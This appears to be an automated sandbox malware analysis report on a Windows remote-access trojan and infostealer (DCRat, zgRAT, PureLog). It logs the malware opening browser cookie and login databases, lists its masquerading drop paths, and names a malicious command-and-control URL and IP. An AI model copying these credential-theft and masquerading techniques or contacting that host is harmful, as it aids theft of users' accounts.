                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                        Remote Access Functionality

                        Source: Yara match, File source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: ComrefNetsvc.exe PID: 7956, type: MEMORYSTR
                        Source: Yara match, File source: 8.0.ComrefNetsvc.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 00000008.00000000.1964321425.0000000000012000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000000.00000003.1668531861.00000000053CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, type: DROPPED
                        Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, type: DROPPED
                        Source: Yara match, File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, type: DROPPED
                        Source: Yara match, File source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, type: DROPPED
                        Source: Yara match, File source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, type: DROPPED
                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | 11 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 31 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 167 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | Login Hook | Login Hook | 1 Software Packing | NTDS | 361 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 33 Masquerading | Cached Domain Credentials | 271 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 271 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                        [Figure: Behavior Graph. ID: 1589235, Sample: OisrvsB6Ea.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100]

                        Source | Detection | Scanner | Label | Link
                        OisrvsB6Ea.exe | 61% | ReversingLabs | Win32.Trojan.Uztuby |
                        OisrvsB6Ea.exe | 51% | Virustotal | | Browse
                        OisrvsB6Ea.exe | 100% | Joe Sandbox ML | |

                        Source | Detection | Scanner | Label | Link
                        C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe | 100% | Avira | HEUR/AGEN.1323342 |
                        C:\Program Files\WindowsPowerShell\Modules\sihost.exe | 100% | Avira | HEUR/AGEN.1323342 |
                        C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe | 100% | Avira | HEUR/AGEN.1323342 |
                        C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat | 100% | Avira | BAT/Delbat.C |
                        C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe | 100% | Joe Sandbox ML | |
                        C:\Program Files\WindowsPowerShell\Modules\sihost.exe | 100% | Joe Sandbox ML | |
                        C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe | 100% | Joe Sandbox ML | |
                        C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                        C:\Program Files\WindowsPowerShell\Modules\sihost.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                        C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                        C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                        C:\Users\user\Desktop\BkJolhdT.log | 25% | ReversingLabs | |
                        C:\Users\user\Desktop\DBQFDgRN.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                        C:\Users\user\Desktop\DjKnpLXK.log | 25% | ReversingLabs | |
                        C:\Users\user\Desktop\FpiFczmJ.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                        C:\Users\user\Desktop\PVPluWhn.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                        C:\Users\user\Desktop\REWLTGNk.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                        C:\Users\user\Desktop\YBKLwVHY.log | 5% | ReversingLabs | |
                        C:\Users\user\Desktop\ZDjBezmV.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                        C:\Users\user\Desktop\amqbDjSR.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                        C:\Users\user\Desktop\mUJprpRq.log | 5% | ReversingLabs | |
                        C:\Users\user\Desktop\pIbqPImn.log | 25% | ReversingLabs | |
                        C:\Users\user\Desktop\tSxpUEMf.log | 8% | ReversingLabs | |
                        C:\Users\user\Desktop\vBEPsorb.log | 8% | ReversingLabs | |
                        C:\Users\user\Desktop\xIogbBMY.log | 25% | ReversingLabs | |
                        C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                        No Antivirus matches
                        No Antivirus matches
Source | Detection | Scanner | Label
http://588538cm.renyash.ru/polldle.php | 100% | Avira URL Cloud | malware

Name | IP | Active | Malicious | Antivirus Detection | Reputation
588538cm.renyash.ru | 104.21.38.84 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://588538cm.renyash.ru/polldle.php | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.38.84 | 588538cm.renyash.ru | United States | 13335 | CLOUDFLARENETUS | true

IP
127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589235
Start date and time: 2025-01-11 23:31:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 53
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OisrvsB6Ea.exe
renamed because original name is a hash value
Original Sample Name: 092F45DAC00EF24F3836DBFE18DFA931.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@76/343@1/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 51%
• Number of executed functions: 211
• Number of non-executed functions: 105
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ComrefNetsvc.exe, PID 7956 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
17:32:34 | API Interceptor | 435x Sleep call for process: powershell.exe modified
17:32:50 | API Interceptor | 554729x Sleep call for process: TnsvMjfQwJOjpYJzqEDNh.exe modified
17:32:51 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Process: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
File Type: ASCII text, with very long lines (423), with no line terminators
Category: dropped
Size (bytes): 423
Entropy (8bit): 5.859209680800249
Encrypted: false
SSDEEP: 12:g8HYuTjZ0sPlgTSxiEpvN0TGlp3ry0o5QO8wfQIbTfDiTfin:N4ojZLtgT8i+vOCHb948wLXkfin
MD5: 12F8A41946E984A15753793B4DA7AD44
SHA1: DE659491F6E4F6D4911C1AB70388F0179B17C950
SHA-256: 6518C628F539387D50F1538B00ED75B7781D53EBB28C8E008C0CACA61735775C
SHA-512: 161EF67D47A782F2456FEE951A36FD7CDC90E27225E2A3BF9FDE668EB6353754A177A62620F75B4E03BCD7A449C3A9656E6E319DCD561D3C49B7FA7BC1EBC89C
Malicious: false
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with very long lines (720), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):720
                                                                                Entropy (8bit):5.8704731776860655
                                                                                Encrypted:false
                                                                                SSDEEP:12:4bwGMrHRSrys6mYzkHI4V5z4yH1bG56DtY8MBt/fyunJO1fs3M9qRRAjmHI:4bzQaV7iWIu5zdG56DLMzqs89qj4
                                                                                MD5:AF656608DE71DF8920F763FD8E055840
                                                                                SHA1:462AE9AA0848277F836AAAA9A0BA611C93E961B4
                                                                                SHA-256:F19397595A6CD633435039C4F89B59E99E3D4209B91AC8F28A93DAC4137154D7
                                                                                SHA-512:D0B56E5FDEB71B69909252F1FD0513977323170848EEA9663F7BDD7FF9ABBBEF519590CF5567B9C4BE61B6327D7B27460E58E21D0319EE74BDD8266ACC755BAD
                                                                                Malicious:false
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xad2bc21b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.422133273947136
                                                                                Encrypted:false
                                                                                SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                MD5:9693234ECD4263F63CC324C4BFDE2153
                                                                                SHA1:007D206189607386A36CD9A73B08D088A790AAA5
                                                                                SHA-256:9D68600586FB1E11D8A229FF9E5B110830B427F43505E81E51B4AAEBC8BBD981
                                                                                SHA-512:CFD4FCD180D40D78EFC7F33795A05696795114FF41BFEDF85C1042B7DB05AC705153BD9623B2DCC9594A95A8059A71F64F76CE0EB3377E6F60828ED3253FE282
                                                                                Malicious:false
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with very long lines (521), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):521
                                                                                Entropy (8bit):5.877880996868902
                                                                                Encrypted:false
                                                                                SSDEEP:12:z1wTwrMUfsElOFSZP36sXyTzWYI0Yy0bPDXPSaaJAKrYRTv:ZmpZyd6RYfbP+aaJ4N
                                                                                MD5:6AB41136D80B19AA985595CD06ECB4AE
                                                                                SHA1:175C53E0ADCDA948244F4DD1C76D56D82D3941F5
                                                                                SHA-256:56B224FCCB0AE6F9393242F299204EF5F97B2A3506B80E56488A69EBA38020F4
                                                                                SHA-512:E084A40A3F803BB01DC7447032E046A5593CC5F887B6631B1861C75C86D67B99BC377833101D5EA9DC26987F3DFE20D3FEA8F29E7C03C3A3838B8E51B81849E2
                                                                                Malicious:false
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):1698
                                                                                Entropy (8bit):5.367720686892084
                                                                                Encrypted:false
                                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4x
                                                                                MD5:1CC465BAC3EF7B2D68EBEDF067EF45EA
                                                                                SHA1:2C2DEC3CF0CBCCF3B3238ADEB28524C909BA5273
                                                                                SHA-256:F4604427137BD1C68C5FC6CA6A23DA69977F78ACE88B0C1D3BEBCFA59D64B6F6
                                                                                SHA-512:EE3CB2F0E3696758A3D7E15D9F2B9436EC7307509259AEF502892AE665F59BC50EA75C47200D73BBA4C90A8C07B5736843CDC75CAA4751531D5541AF934CFE51
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):19253
                                                                                Entropy (8bit):5.005753878328145
                                                                                Encrypted:false
                                                                                SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                Malicious:false
                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):64
                                                                                Entropy (8bit):1.1940658735648508
                                                                                Encrypted:false
                                                                                SSDEEP:3:NlllulJnp/p:NllU
                                                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                Malicious:false
                                                                                Preview:@...e.................................X..............@..........
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
